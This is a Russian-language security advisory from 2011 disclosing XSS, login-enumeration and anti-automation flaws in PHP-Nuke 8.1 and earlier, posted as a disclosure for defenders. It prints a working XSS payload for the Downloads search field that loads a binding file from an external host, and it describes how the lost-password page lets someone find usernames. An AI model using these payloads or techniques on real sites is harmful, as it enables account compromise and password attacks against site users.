Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:26141
HistoryApr 17, 2011 - 12:00 a.m.

XSS, AoF и IAA уязвимости в PHP-Nuke

2011-04-1700:00:00
vulners.com
17

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting, Abuse of
Functionality и Insufficient Anti-automation уязвимостях в PHP-Nuke.

XSS (WASC-08):

POST запрос на странице http://site/modules.php?name=Downloads

"
style="-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml#xss')
В поле поиска.

Это версия для Mozilla и Firefox (до 3.0). Пример эксплоита:

http://websecurity.com.ua/uploads/2011/PHP-Nuke%20XSS.html

Abuse of Functionality (WASC-42):

http://site/modules.php?name=Your_Account&op=pass_lost

Через данный функционал можно выявлять логины в системе.

Insufficient Anti-automation (WASC-21):

Учитывая, что данный функционал не имеет защиты от автоматизированных
атак, это позволяет проводить автоматизированное выявление логинов в
системе (а также рассылку писем пользователям сайта). В дальнейшем
выявленные логины могут быть использованы для определения паролей
пользователей системы.

Уязвимы PHP-Nuke 8.1 и предыдущие версии.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/5009/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua